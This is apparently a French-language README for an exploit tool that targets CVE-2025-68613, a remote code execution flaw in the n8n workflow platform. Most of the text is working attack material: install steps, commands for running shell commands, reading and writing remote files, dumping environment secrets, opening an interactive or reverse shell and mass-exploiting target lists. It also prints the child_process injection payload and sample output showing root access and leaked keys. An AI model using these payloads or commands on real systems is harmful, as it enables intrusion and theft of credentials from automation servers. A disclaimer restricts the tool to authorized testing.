
n8n God Mode Ultimate - CVE-2025-68613 Scanner v1.0.0 ║ ║ Exécution de code à distance dans l'automatisation de workflows
n8n God Mode Ultimate est un framework complet de tests de sécurité conçu pour détecter et valider CVE-2025-68613 sur les plateformes d'automatisation de workflows n8n. Cette vulnérabilité critique d'exécution de code à distance (RCE) affecte les versions de n8n via une injection d'expression dans les contextes d'exécution des workflows.
Versions concernées :
Versions corrigées :
--detect - Détection de version uniquement (le plus rapide, non intrusif)--safe - Vérification sécurisée de la vulnérabilité sans exploitation--poc - Validation de preuve de concept RCE--exploit - Mode exploitation complèteread <fichier> - Lire des fichiers distantswrite <fichier> <contenu> - Écrire des fichiers sur la cible# Python 3.8 ou supérieur
python3 --version
# Gestionnaire de paquets pip
pip3 --version
# Cloner le dépôt
git clone https://github.com/hackersatyamrastogi/n8n-exploit-CVE-2025-68613-n8n-God-Mode-Ultimate.git
cd n8n-exploit-CVE-2025-68613-n8n-God-Mode-Ultimate
# Installer les paquets requis
pip3 install -r requirements.txt
requests>=2.31.0
urllib3>=2.0.0
tqdm>=4.66.0
colorama>=0.4.6
# Afficher le menu d'aide
python3 n8n-godmode-ultimate.py -h
# Détecter la version de n8n (non intrusif)
python3 n8n-godmode-ultimate.py -u http://cible:5678 --detect
# Vérification sécurisée de la vulnérabilité
python3 n8n-godmode-ultimate.py -u http://cible:5678 --safe -e [email protected] -p motdepasse
# Preuve de concept RCE
python3 n8n-godmode-ultimate.py -u http://cible:5678 --poc -e [email protected] -p motdepasse
# Exploitation complète
python3 n8n-godmode-ultimate.py -u http://cible:5678 --exploit -e [email protected] -p motdepasse
# Exécuter une seule commande
python3 n8n-godmode-ultimate.py --god -u http://cible:5678 \
-e [email protected] -p motdepasse --cmd "whoami"
# Lire un fichier distant
python3 n8n-godmode-ultimate.py --god -u http://cible:5678 \
-e [email protected] -p motdepasse --read-file "/etc/passwd"
# Écrire un fichier distant
python3 n8n-godmode-ultimate.py --god -u http://cible:5678 \
-e [email protected] -p motdepasse --write-file "/tmp/test.txt" --content "payload"
# Extraire les variables d'environnement
python3 n8n-godmode-ultimate.py --god -u http://cible:5678 \
-e [email protected] -p motdepasse --dump-env
# Shell interactif
python3 n8n-godmode-ultimate.py --god -u http://cible:5678 \
-e [email protected] -p motdepasse --shell
# Scanner plusieurs cibles depuis un fichier
python3 n8n-godmode-ultimate.py -l cibles.txt --detect -t 20
# Exploitation par lots
python3 n8n-godmode-ultimate.py -l cibles.txt --poc -e [email protected] -p motdepasse -t 10
Format de cibles.txt :
http://cible1:5678
https://cible2.example.com
http://192.168.1.100:5678
https://n8n.example.org
Une fois en mode shell (--shell) :
n8n> whoami # Exécuter une commande
n8n> read /etc/passwd # Lire un fichier
n8n> env # Afficher les variables d'environnement
n8n> info # Informations système
n8n> history # Historique des commandes
n8n> exit # Quitter le shell
-u, --url URL URL cible n8n
-l, --list FILE Fichier contenant les URL cibles
-t, --threads NUM Nombre de threads pour le scan par lots (défaut : 10)
-e, --email EMAIL Email utilisateur n8n
-p, --password PASS Mot de passe utilisateur n8n
--detect Détection de version uniquement (le plus rapide)
--safe Vérification sécurisée sans exploitation
--poc Preuve de concept RCE
--exploit Mode exploitation complète
--god Activer le god mode
--cmd COMMAND Exécuter une seule commande
--read-file PATH Lire un fichier distant
--write-file PATH Écrire un fichier distant
--content DATA Contenu pour l'opération d'écriture
--dump-env Extraire toutes les variables d'environnement
--shell Mode shell interactif
--revshell HOST:PORT Payload reverse shell
--mode MODE Mode d'exploitation : schedule|webhook|code|expression (défaut : schedule)
--timeout SEC Délai d'attente de commande en secondes (défaut : 30)
--cleanup Supprimer les workflows après exécution
-k, --insecure Désactiver la vérification SSL
-v, --verbose Sortie détaillée
-q, --quiet Sortie minimale
Crée un workflow avec un déclencheur planifié qui s'exécute automatiquement toutes les 3 secondes. Méthode la plus fiable.
Payload: {{(function(){
return this.process.mainModule.require('child_process')
.execSync('whoami').toString()
})()}}
Crée un point de terminaison HTTP webhook qui exécute des commandes lorsqu'il est déclenché.
Injecte du code directement dans un nœud de code avec accès à child_process.
Exécution manuelle via le système d'évaluation d'expressions de n8n.
Extrait la version de la configuration Sentry encodée en base64 sur la page de connexion :
<meta name="n8n:config:sentry" content="eyJ2ZXJzaW9uIjoi..." />
/rest/login - Authentification/rest/workflows - Opérations CRUD sur les workflows/rest/credentials - Énumération des identifiants/rest/executions - Récupération des journaux d'exécution/rest/users - Énumération des utilisateurs/rest/settings - Configuration système[*] n8n God Mode Ultimate v1.0.0
[*] Cible : https://target.example.com
[✓] Version n8n : 1.36.1
[!] Statut : VULNÉRABLE (< 1.120.4)
[*] Authentification réussie
[*] Création du workflow d'exploitation...
[*] ID du workflow : hd6LxSY765WBThqd
[*] Exécution de la commande : whoami
[✓] Commande exécutée avec succès !
[+] Sortie : root
n8n> whoami
[+] root
n8n> read /etc/hostname
[+] n8n-production-server
n8n> env
[+] Variables d'environnement :
N8N_ENCRYPTION_KEY=a1b2c3d4e5f6...
DATABASE_HOST=postgres.internal
AWS_ACCESS_KEY_ID=AKIA...
POUR LES TESTS DE SÉCURITÉ AUTORISÉS UNIQUEMENT
Cet outil est fourni à des fins éducatives et pour des tests de sécurité autorisés. Les utilisateurs doivent se conformer à toutes les lois et réglementations applicables.
VOUS DEVEZ :
VOUS NE DEVEZ PAS :
L'auteur décline toute responsabilité en cas d'utilisation abusive de cet outil. L'accès non autorisé à des systèmes informatiques est illégal en vertu de :
Utilisez à vos risques et périls. Vous êtes responsable de vos actions.
Les contributions sont les bienvenues ! Veuillez suivre ces directives :
git checkout -b feature/amelioration)git commit -am 'Ajouter une nouvelle fonctionnalité')git push origin feature/amelioration)Satyam Rastogi
Ce projet est sous licence MIT - voir le fichier LICENSE pour plus de détails.
MIT License
Copyright (c) 2025 Satyam Rastogi
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT.
Pour les problèmes de sécurité, veuillez signaler de manière responsable :
⭐ Starrez ce dépôt si vous l'avez trouvé utile !
Fabriqué avec 💻 par des chercheurs en sécurité, pour des chercheurs en sécurité